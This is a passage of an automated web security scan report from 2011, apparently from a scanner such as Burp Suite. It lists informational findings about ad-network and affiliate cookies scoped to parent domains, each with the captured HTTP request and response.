P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.48. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A3=le30aXzs06hH00001hITfaPj402WG00001kkgaaRpa038X00001jDClaTYi0cbS00001iWmhaSED0cb100001kfxTaPj40aLz00001jkozaUUI0c7w00001kWgdaUUO09SF00001jDDbaTYi0cbS00001jmdWaRBM0c7w00001htTqaPvL02WG00001kfL6aPj30aLz00001jNtbaUUO09sO00000kDBSaRp908HF00001kDFiaPj408HF00001iOnPaUUK03sY00001jpQXaRwv05qO00001kMmAaPj208B400001jxYWaUMm0bn800001iOpqaUUK03sY00001jDDnaUUx0cbS00001hWjPaRu109wy00002kHfhaPj302WG00001jkncaRBL0c7w00001kSTxaRuU06yP00001jBrJaXnt035P00001jA0ZaPj206hH00001jkpdaPj30c7w00001kGfMaPj208HF00002kCKXaXnm08HG00001jNtfaUUK09sO00000kMqaaPj302WG00001kDAVaRp908HF00001kZ5yaTDK07Y700001kQ2WaUUO0dKm00001kHhnaUnJ02WG00001iBmTaRqF08te00001kEncaRLI0alG00001kcLvaUUK0dCb00001lu0naYv80czN00002; expires=Wed, 14-Sep-2011 11:52:11 GMT; domain=.serving-sys.com; path=/
B3=a9iq0000000001uQ8Vlw0000000001u+990p0000000001v59j0T0000000001u+9cm20000000001uT8nlR0000000001uK9ZD90000000001uQamoJ0000000001v5alVe0000000001u+ajUW0000000001u+8DfZ0000000001uKa0fG0000000001uZ9XzA0000000001u+ahIj0000000001uK89+70000000001uQahI50000000001uK9i8d0000000001uK93LT0000000001uQ84hR0000000002uQa9it0000000001uQ9xux0000000001uX9i8b0000000001uK8DfJ0000000001uK9X5M0000000001uW9D2u0000000000u+9D2y0000000000u+9iQ70000000002uQaF7y0000000002v87dOu0000000001uY9xuy0000000001uX9v4a0000000001uKa9j40000000001uK9gvS0000000001uK9XJ40000000001uR8Vlx0000000001u+9xup0000000001u+9qZf0000000001uQ7dYp0000000001uK9gvT0000000001uK90mq0000000001v5; expires=Wed, 14-Sep-2011 11:52:11 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2789858&PluID=0&w=300&h=250&ord=1117403339&ncu=$$http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/1117403339/x15/USNetwork/BCN2011060011_003_MotoAtrix/Moto_CPC_300.html/726348573830336e374e674144526a62?http://$$&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=le30aXzt06hH00001hITfaPj402WG00001kkgaaRpa038X00001jDClaTYi0cbS00001iWmhaSED0cb100001kfxTaPj40aLz00001jkozaUUI0c7w00001kWgdaUUO09SF00001jDDbaTYi0cbS00001jmdWaRBM0c7w00001htTqaPvL02WG00001kfL6aPj30aLz00001jNtbaUUO09sO00000kDBSaRp908HF00001kDFiaPj408HF00001iOnPaUUK03sY00001jpQXaRwv05qO00001kMmAaPj208B400001jxYWaUMm0bn800001iOpqaUUK03sY00001jDDnaUUx0cbS00001hWjPaRu109wy00002kHfhaPj302WG00001jkncaRBL0c7w00001kSTxaRuU06yP00001jBrJaXnt035P00001jA0ZaPj206hH00001jkpdaPj30c7w00001kGfMaPj208HF00002kCKXaXnm08HG00001jNtfaUUK09sO00000kMqaaPj302WG00001kDAVaRp908HF00001kZ5yaTDK07Y700001kQ2WaUUO0dKm00001kHhnaUnJ02WG00001iBmTaRqF08te00001kEncaRLI0alG00001kcLvaUUK0dCb00001kMnvaPj008B400001; B3=a9iq0000000001uQ8Vlw0000000001u+990p0000000001v59j0T0000000001u+9cm20000000001uT8nlR0000000001uK9fOC0000000002uK9ZD90000000001uQamoJ0000000001v5alVe0000000001u+ajUW0000000001u+8DfZ0000000001uKa0fG0000000001uZ9XzA0000000001u+ahIj0000000001uK89+70000000001uQahI50000000001uK9i8d0000000001uK93LT0000000001uQ84hR0000000002uQa9it0000000001uQ9xux0000000001uX9i8b0000000001uK8DfJ0000000001uK9X5M0000000001uW9D2u0000000000u+9D2y0000000000u+9iQ70000000002uQ7dOu0000000001uY9xuy0000000001uX9v4a0000000001uKa9j40000000001uK9gvS0000000001uK9XJ40000000001uR8Vlx0000000001u+9xup0000000001u+9qZf0000000001uQ7dYp0000000001uK9gvT0000000001uK90mq0000000001v5

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=le30aXzs06hH00001hITfaPj402WG00001kkgaaRpa038X00001jDClaTYi0cbS00001iWmhaSED0cb100001kfxTaPj40aLz00001jkozaUUI0c7w00001kWgdaUUO09SF00001jDDbaTYi0cbS00001jmdWaRBM0c7w00001htTqaPvL02WG00001kfL6aPj30aLz00001jNtbaUUO09sO00000kDBSaRp908HF00001kDFiaPj408HF00001iOnPaUUK03sY00001jpQXaRwv05qO00001kMmAaPj208B400001jxYWaUMm0bn800001iOpqaUUK03sY00001jDDnaUUx0cbS00001hWjPaRu109wy00002kHfhaPj302WG00001jkncaRBL0c7w00001kSTxaRuU06yP00001jBrJaXnt035P00001jA0ZaPj206hH00001jkpdaPj30c7w00001kGfMaPj208HF00002kCKXaXnm08HG00001jNtfaUUK09sO00000kMqaaPj302WG00001kDAVaRp908HF00001kZ5yaTDK07Y700001kQ2WaUUO0dKm00001kHhnaUnJ02WG00001iBmTaRqF08te00001kEncaRLI0alG00001kcLvaUUK0dCb00001lu0naYv80czN00002; expires=Wed, 14-Sep-2011 11:52:11 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=a9iq0000000001uQ8Vlw0000000001u+990p0000000001v59j0T0000000001u+9cm20000000001uT8nlR0000000001uK9ZD90000000001uQamoJ0000000001v5alVe0000000001u+ajUW0000000001u+8DfZ0000000001uKa0fG0000000001uZ9XzA0000000001u+ahIj0000000001uK89+70000000001uQahI50000000001uK9i8d0000000001uK93LT0000000001uQ84hR0000000002uQa9it0000000001uQ9xux0000000001uX9i8b0000000001uK8DfJ0000000001uK9X5M0000000001uW9D2u0000000000u+9D2y0000000000u+9iQ70000000002uQaF7y0000000002v87dOu0000000001uY9xuy0000000001uX9v4a0000000001uKa9j40000000001uK9gvS0000000001uK9XJ40000000001uR8Vlx0000000001u+9xup0000000001u+9qZf0000000001uQ7dYp0000000001uK9gvT0000000001uK90mq0000000001v5; expires=Wed, 14-Sep-2011 11:52:11 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 16 Jun 2011 15:52:10 GMT
Connection: close
Content-Length: 2638

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.49. http://c7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

FFAbh=897B305,20|165_2#365;expires=Fri, 15 Jun 2012 11:29:29 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=305&g=20&a=165&s=1&t=i HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26Nu%3DP_PARENT_ID%26searchNav%3Dtrue&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_two=3bc35c3f-44ee-45ce-a5d3-315a00fe8438&dtmc_page_type=Subcategory&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; __qca=P0-1637156077-1305746709690; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFgeo=2241452; ZEDOIDX=13; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819:1219,17#736041,15#736039|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1:0,30,1:0,30,1; FFCap=1595B305,201787:933,196008,139660:1219,217400,217401|0,13,1:0,30,1:0,30,1:0,30,1:0,30,1; ZFFAbh=879B826,20|1477_897#383Z120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 45
Content-Type: image/gif
Set-Cookie: FFAbh=897B305,20|165_2#365;expires=Fri, 15 Jun 2012 11:29:29 GMT;domain=.zedo.com;path=/;
ETag: "85ecfbee-7054-49420a02cd680"
X-Varnish: 1708187920 1708184115
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=29002
Expires: Thu, 16 Jun 2011 19:32:51 GMT
Date: Thu, 16 Jun 2011 11:29:29 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.50. http://cas.criteo.com/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cas.criteo.com
Path:	/delivery/afr.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

udc=*1CHZCRgIx6nSg3nCboPSuV5GDm6LZbYWApuRyCJPc%2bhchb5KpLbYf1Lu3OAJhT9WT3pwfiRHdLJOgnKf1ltoJegC3En0YtacsPpePTD4Vs%2femUcMNCMz2iyF3TS35px7NaUtIpAen77OgY4z8Fw92jSb5amVKhnzpAgWyOIczt3gvErTOrDuHbNuDjHOBlH30xvNbTy74RniR04mX6Oj1XZN%2feyZMFLdzAqv49%2f%2fIw4I%3d; domain=.criteo.com; expires=Fri, 16-Dec-2011 14:08:02 GMT; path=/
udi=*1wQWNbHL2BkixwAS4DgWF1g%3d%3d; domain=.criteo.com; expires=Fri, 17-Jun-2011 13:08:02 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url= HTTP/1.1
Host: cas.criteo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308227124764&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; uid=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; uic=*1Tomxq8BrFqEZpOQ1bYZp%2fND65D1Dr0%2bwadZwFhIoW6DsGVIMB%2f6HGvVv7TZhsJpJJy%2bDlXOyvfUh3xY0%2bPBNg7eDvTqiczs7KP78YRRXAMGdlN%2bn0Wdd097FO5MHAJnz; OAID=c4f44b7e907447a2bdf09dda4e9d5fa4; OACBLOCK=; OACCAP=; udc=*1i%2fe%2bLjAs0TEB51hTQBofj2227V3VnIb8ulW7T07rTrmSvA4PnzvJw%2f9Uo1nfR01n7XrcO%2fxtq9GUbOaIsxqCZvY29jzvL13uqH%2bDTaBuJ1Qlgu8M5vAWtcLPtARABTr0Fb9BRIBpzdGrk5UfY8FUvw%3d%3d; dis=*1NF86MUZd6c1VYXpuQVQX61FoNgUTTGWP4DBJjHeLvgwwzVQPYkqKFliYgRRHHiWRd4A9C%2bMhD8dIzoAq9sUfQU6rh2QfWp%2fgl%2fVFquvWGdM44triH0IpGacCbSPyqTgFWS90qxlH22Trpzx55Ay7luPNVd33QFUmaXVw2UnehM5c8o%2bjjx2gvA1fAvqLh1uu6jMQVuLsCJztH3WQcgf3q2IRjldWFyY74oxhFtYhKqjDBYi8Wmzct1rHj6hahPIK%2bf6I6EAzqs07qFz5HivlpJB3KXqX%2bYReY5BKnm1f6YPyx3rGC4VAthijO1KW877lR6jowtBjhqPs%2bdhHHsbqBQtPD7Uv8Q5BOPFebr9cdG1ZRSZWEjeP7RFnBGpqvaldxvTsO4ulu%2fJpnOfId77O3BM0qTyhnyVPL%2bZ1INZWq5NmM9CTwZBDjtBnvq8fNsaovVcC508mQQod6ahIZ8T6Hw%3d%3d

Response

10.51. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 10:40:34 GMT; Path=/
lsn_qstring=EhraRx8K%2FBE%3A227478%3A112921cf20116d066717054a40e927; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 10:40:34 GMT; Path=/
lsn_track=UmFuZG9tSVaW6jp2Mr2CRQ0X6ULzI68IQG6YCv45HHNWoMG%2FWpbPCgUZC70qa5dY25ELTn6bG0L95MCoLETQrA%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 10:40:34 GMT; Path=/
lsclick_mid2291="2011-06-17 10:40:34.174|EhraRx8K_BE-8OpVti2WTAMLAYgaqyOFaA"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 10:40:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs-bin/click?id=EhraRx8K/BE&offerid=224016.10001591&type=3&subid=0&u1=112921cf20116d066717054a40e927 HTTP/1.1
Host: click.linksynergy.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125744&pg=1477&pgpos=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: lsn_statp=XJG0rhcAAADvdDvwMI7FTQ%3D%3D; Domain=.linksynergy.com; Expires=Thu, 12-Jun-2031 10:40:34 GMT; Path=/
Set-Cookie: lsn_qstring=EhraRx8K%2FBE%3A227478%3A112921cf20116d066717054a40e927; Domain=.linksynergy.com; Expires=Sat, 18-Jun-2011 10:40:34 GMT; Path=/
Set-Cookie: lsn_track=UmFuZG9tSVaW6jp2Mr2CRQ0X6ULzI68IQG6YCv45HHNWoMG%2FWpbPCgUZC70qa5dY25ELTn6bG0L95MCoLETQrA%3D%3D; Domain=.linksynergy.com; Expires=Mon, 14-Jun-2021 10:40:34 GMT; Path=/
Set-Cookie: lsclick_mid2291="2011-06-17 10:40:34.174|EhraRx8K_BE-8OpVti2WTAMLAYgaqyOFaA"; Domain=.linksynergy.com; Expires=Sun, 16-Jun-2013 10:40:34 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa OUR BUS STA"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Fri, 17 Jun 2011 10:40:33 GMT
Cache-Control: no-cache
Pragma: no-cache
Location: https://applynow.chase.com/FlexAppWeb/renderApp.do?SPID=DDC6&CELL=6H8X&AFFID=EhraRx8K_BE-8OpVti2WTAMLAYgaqyOFaA&pvid=112921cf20116d066717054a40e927
Content-Length: 0
Connection: close

10.52. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ZFFAbh=879B826,20|1477_897#383Z120_879#365;expires=Fri, 15 Jun 2012 11:28:58 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=1477&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Navigation%3FstoreId%3D10051%26categoryID%3D556456%26langId%3D-1%26catalogId%3D10053%26selectedCatgry%3DSEARCH%2520ALL%26navFlow%3D3%26searchRedirect%3Dlawn%2520mower%26Nu%3DP_PARENT_ID%26locStoreNum%3D4501&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment%3EWalk%20Behind%20Mowers&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment%3EWalk%20Behind%20Mowers&dtmc_prop_two=e04ee989-dab2-408d-ab5e-0f5dd59957f0&dtmc_prop_four=lawn%20mower&dtmc_page_type=Subcategory&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; __qca=P0-1637156077-1305746709690; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; ZFFAbh=879B826,20|120_879#365; FFgeo=2241452; ZEDOIDX=13; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819:1219,17#736041,15#736039|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1:0,30,1:0,30,1; FFCap=1595B305,201787:933,196008,139660:1219,217400,217401|0,13,1:0,30,1:0,30,1:0,30,1:0,30,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=879B826,20|1477_897#383Z120_879#365;expires=Fri, 15 Jun 2012 11:28:58 GMT;domain=.zedo.com;path=/;
ETag: "3a9d60b-7054-4942082502f40"
X-Varnish: 1435724280 1435712339
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=4517
Expires: Thu, 16 Jun 2011 12:44:15 GMT
Date: Thu, 16 Jun 2011 11:28:58 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

10.53. http://dis.ny.us.criteo.com/dis/dis.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dis.ny.us.criteo.com
Path:	/dis/dis.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

udc=*1CHZCRgIx6nSg3nCboPSuV5GDm6LZbYWApuRyCJPc%2bhchb5KpLbYf1Lu3OAJhT9WT3pwfiRHdLJOgnKf1ltoJegC3En0YtacsPpePTD4Vs%2fel5n8GoLlWfnQY20hrwPZnMI%2f%2bu02gZCFZ%2f893laStaSW0gKAVim%2b7apphxKCZu%2fGGE4OLoXme7LscLiSH70QUWd7ic2Jkw03Gp1TD%2barlV5IK8T3LqodepWEE2%2bfRBZ%2b3e5oAKW6qyLfutMHEihHW38sVu6Sf%2bPeUlqCY7gNUpnYdq28lFf7ztFdkLFjaiSxpJtKKC9P5hcCP95gDyECw%2bU%2bsqiYKWtj9dgA2AWE2Mnuy9qWa1Z3X8BmvRSc4jiLNP4fqDVJ3yHP%2bj77%2fCz3%2b3KjBFLZxHWLnxM02HG4VHETRwakPRLdV8GRWD2Pu8UCkBaEArmq8gnJKTadUvDrcJFAzs2Z64TyIEcBIGNPmiqq0A5s8dlT6pHXfpVKdrGMCV%2bHNgcaATshFiot5B9ZUWGqt37zae6vVQXHZs5lOlEpDdIUevqT70JDoFoQsAd1CZdlIiSe0VHOH4lr2sDGyd%2bcSXSj1FQUtO6PesxcgG%2f6WhO%2bH6uK3Ei2JaDpbkj2c9OAvfD59v9OHkExPfwLwJDJF1tKaWLHjPs9r387HtpZFY%2bnsT7OnNp8AplcPjZI199i06M4IOr%2fBdxQ3V7I%2bd1MYpFWjcfIASVfiYk%2b61t6kMCEgwazHiqG%2f7pGlKHW%2fkO7vyHkQykQNRQXDZ1QatHtU66jDxwS2f687ENQXpZyjO5q9dpG8ta1%2fLLdEgFRvJ2RjW7UlAZfaRAZ0Qrek2AWVn2Bdr4MRioik3U2Mi4PZxQQ1oKJgppZDrEMhcaGgcokkkHIWQXIL9mS5sta4DEs%2bLDghGjVKQLGqd5j%2bVT1yQYcRUa8RWZfDev388BCRLoZXHEscuKd8%2frb2Ws2J5xCVAXmiW%2bUD3nZSpiHJG135wvdge42Ehp5wBJzORKShsF%2fWxtKIudx3YYaP788csoL8Ukzd5gDI79lCeQbLq8PnLEUBDsd3Mj3GaSJ5JMCnt%2fmPTrdxCRtc7HAH%2fu5ZxdNZiy0DjDUbVYiTJIytqTobFMhs%2f0lHktVdMI0C5RtZae4WL1SGluE3c1Au2waFBDoodGpjqRBGq6xSQJm3Iw%3d%3d; domain=.criteo.com; expires=Fri, 16-Dec-2011 14:08:10 GMT; path=/
dis=*1AIhVRSZrQgYu9x47ppfIGqqnT57MQO9KKEitnRSffraIMr16RaqB2jBwUTPWIs60iAfgOM%2bJyadJJMNrThoicjk6JBenkl27rLp7xnDfdVxENXrZoJIZ%2brOdTm%2bhZcp9HEu0Wsa6G79lcjBzWSIh4SpHnpBSph43jRgJXOPpaLg%3d; domain=.criteo.com; expires=Fri, 16-Dec-2011 14:08:10 GMT; path=/
udi=*1wQWNbHL2BkixwAS4DgWF1g%3d%3d; domain=.criteo.com; expires=Fri, 17-Jun-2011 13:08:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dis/dis.aspx?pu=1108&c=197&cb=46e975b383 HTTP/1.1
Host: dis.ny.us.criteo.com
Proxy-Connection: keep-alive
Referer: http://cas.criteo.com/delivery/afr.php?zoneid=2734&ct0=http://optimized-by.rubiconproject.com/t/6451/11953/20435-2.3183300.3199522?url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; uid=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; uic=*1Tomxq8BrFqEZpOQ1bYZp%2fND65D1Dr0%2bwadZwFhIoW6DsGVIMB%2f6HGvVv7TZhsJpJJy%2bDlXOyvfUh3xY0%2bPBNg7eDvTqiczs7KP78YRRXAMGdlN%2bn0Wdd097FO5MHAJnz; dis=*1NF86MUZd6c1VYXpuQVQX61FoNgUTTGWP4DBJjHeLvgwwzVQPYkqKFliYgRRHHiWRd4A9C%2bMhD8dIzoAq9sUfQU6rh2QfWp%2fgl%2fVFquvWGdM44triH0IpGacCbSPyqTgFWS90qxlH22Trpzx55Ay7luPNVd33QFUmaXVw2UnehM5c8o%2bjjx2gvA1fAvqLh1uu6jMQVuLsCJztH3WQcgf3q2IRjldWFyY74oxhFtYhKqjDBYi8Wmzct1rHj6hahPIK%2bf6I6EAzqs07qFz5HivlpJB3KXqX%2bYReY5BKnm1f6YPyx3rGC4VAthijO1KW877lR6jowtBjhqPs%2bdhHHsbqBQtPD7Uv8Q5BOPFebr9cdG1ZRSZWEjeP7RFnBGpqvaldxvTsO4ulu%2fJpnOfId77O3BM0qTyhnyVPL%2bZ1INZWq5NmM9CTwZBDjtBnvq8fNsaovVcC508mQQod6ahIZ8T6Hw%3d%3d; udc=*1nVfL9%2fZrEpALpitMgPSVmcF%2f6D5fYf1pLPyb9UWfnfacwesAXiFL%2b6rHAHP4L8xkQaFowkZnk8jQSCJS%2byV2d8J27Jb2NXLPPk0bBRrtYnxwA3dA2FzbBDwPVZoHgdUilT3uz45w0OzBiWNV%2fpTooT%2bWKdwlNNNzd9buX%2fJskRPWSmKl%2bgRiOSOL6Yvt4hGQwKisLRquQsmvc2DK%2f6%2fPvQ%3d%3d; udi=*1O%2b%2b4B9wJa5eCOcm%2fRYDCZA%3d%3d

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Thu, 16 Jun 2011 13:08:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: udc=*1CHZCRgIx6nSg3nCboPSuV5GDm6LZbYWApuRyCJPc%2bhchb5KpLbYf1Lu3OAJhT9WT3pwfiRHdLJOgnKf1ltoJegC3En0YtacsPpePTD4Vs%2fel5n8GoLlWfnQY20hrwPZnMI%2f%2bu02gZCFZ%2f893laStaSW0gKAVim%2b7apphxKCZu%2fGGE4OLoXme7LscLiSH70QUWd7ic2Jkw03Gp1TD%2barlV5IK8T3LqodepWEE2%2bfRBZ%2b3e5oAKW6qyLfutMHEihHW38sVu6Sf%2bPeUlqCY7gNUpnYdq28lFf7ztFdkLFjaiSxpJtKKC9P5hcCP95gDyECw%2bU%2bsqiYKWtj9dgA2AWE2Mnuy9qWa1Z3X8BmvRSc4jiLNP4fqDVJ3yHP%2bj77%2fCz3%2b3KjBFLZxHWLnxM02HG4VHETRwakPRLdV8GRWD2Pu8UCkBaEArmq8gnJKTadUvDrcJFAzs2Z64TyIEcBIGNPmiqq0A5s8dlT6pHXfpVKdrGMCV%2bHNgcaATshFiot5B9ZUWGqt37zae6vVQXHZs5lOlEpDdIUevqT70JDoFoQsAd1CZdlIiSe0VHOH4lr2sDGyd%2bcSXSj1FQUtO6PesxcgG%2f6WhO%2bH6uK3Ei2JaDpbkj2c9OAvfD59v9OHkExPfwLwJDJF1tKaWLHjPs9r387HtpZFY%2bnsT7OnNp8AplcPjZI199i06M4IOr%2fBdxQ3V7I%2bd1MYpFWjcfIASVfiYk%2b61t6kMCEgwazHiqG%2f7pGlKHW%2fkO7vyHkQykQNRQXDZ1QatHtU66jDxwS2f687ENQXpZyjO5q9dpG8ta1%2fLLdEgFRvJ2RjW7UlAZfaRAZ0Qrek2AWVn2Bdr4MRioik3U2Mi4PZxQQ1oKJgppZDrEMhcaGgcokkkHIWQXIL9mS5sta4DEs%2bLDghGjVKQLGqd5j%2bVT1yQYcRUa8RWZfDev388BCRLoZXHEscuKd8%2frb2Ws2J5xCVAXmiW%2bUD3nZSpiHJG135wvdge42Ehp5wBJzORKShsF%2fWxtKIudx3YYaP788csoL8Ukzd5gDI79lCeQbLq8PnLEUBDsd3Mj3GaSJ5JMCnt%2fmPTrdxCRtc7HAH%2fu5ZxdNZiy0DjDUbVYiTJIytqTobFMhs%2f0lHktVdMI0C5RtZae4WL1SGluE3c1Au2waFBDoodG